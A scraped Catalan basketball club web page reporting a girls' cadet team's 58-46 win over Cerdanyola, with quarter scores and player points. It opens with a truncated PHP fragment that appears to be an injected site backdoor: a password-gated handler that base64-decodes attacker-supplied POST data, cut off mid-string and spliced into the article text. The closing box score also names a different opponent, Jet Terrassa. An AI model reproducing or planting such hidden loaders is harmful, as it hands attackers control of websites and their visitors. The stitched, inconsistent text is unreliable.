function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet 08A segueix en ratxa! (58-46) - Tgn Bàsquet Club -

El Cadet 08A segueix en ratxa! (58-46)

Updated: febrer 7, 2024

Aquesta setmana rebem al Cerdanyola, un equip molt tècnic i talentós que la temporada passada ens va guanyar els dos partits amb relativa facilitat. Davant nostre hi havien dos partits, jugàvem a la 13:00 i anàvem 45 minuts tard. En el vestuari parlem que calia fer un bon escalfament i sobretot que l’equip que s‘activés abans, començaria amb molt guanyat per endur-se el partit.

Des del minut 1 sortim agressives a tot el camp, el marcador 4-4 ja mostrava que seria un partit igualat. Veiem ràpidament que no ens interessava un partit a camp obert contra un Cerdanyola molt vertical. I decidim no arriscar en defensar a tot camp. Ens centrem en fer-nos fortes a mig camp i ajudar-nos molt en defensa. Un parell de contraatacs després de pilota recuperada ens permet arribar al final del primer quart amb un esperançador 17-9.

En el segon quart, Cerdanyola millora en atac i nosaltres no escollim bé les nostres accions ofensives. Precipitació en atac, no compartim la pilota i els nostres tirs són errats. Cerdanyola aprofita a base de tirs lliures apropar-se al marcador. A la mitja part el marcador mostrava un 27-24.

Al descans, poca cosa a parlar, calia seguir igual, les nostres noies treballen 40 minuts i només havíem jugat la meitat del partit. Demanem molta concentració en els primers 5 minuts del tercer quart, ja que és un quart que sovint ens penalitza.

I aquesta vegada no seria així! La nostra pressió a mig camp marca les diferències. Cerdanyola perd pilotes que aprofitem per anotar. En defensa no deixem tirar de tres punts amb facilitat a les visitants i sobretot tanquem bé el rebot defensiu. Les diferències en el marcador s’eixamplen al nostre favor. 40-31 al final del tercer quart!

Cerdanyola intenta amb una defensa zonal canviar el ritme de partit. Tot i alguns dubtes nostres d’inici en atac, amb paciència aconseguim buscar bons tirs o aprofitar el nostre millor joc interior per sentenciar el partit. Resultat final 58-46.

El treball i esforç de cada dia es veuen reflectits en un bon joc d’equip de les nostres cadets! De moment ens serveix per guanyar, però sobretot ens ha de servir per millorar individualment i com equip!

La setmana vinent un altre repte! Ens visitarà BQ Sabadell. Partit entre els dos equips capdavanters de la classificació. Segur que serà molt difícil! Ànims TGN!!!

CADET FEM 08A 58 – CBF CERDANYOLA 46

Parcials: 17-9; 27-24 ; 40-31 ; 58-46

TGN: DIANA 5 ; JUNY 3, SOFIA 8 ; MARINA 12 , DANIELA 3; HELENA 0 ; JULIA 2 ; ÈLIA 1 ;
MARTA 7, MIREIA 9; LUCIA 5, PAULA 3

JET TERRASSA: CLAUDIA R. 6; ARIADNA C. 8; IVET 4; MARIONA M 0; SOL K 4; EMMA G 1; AINA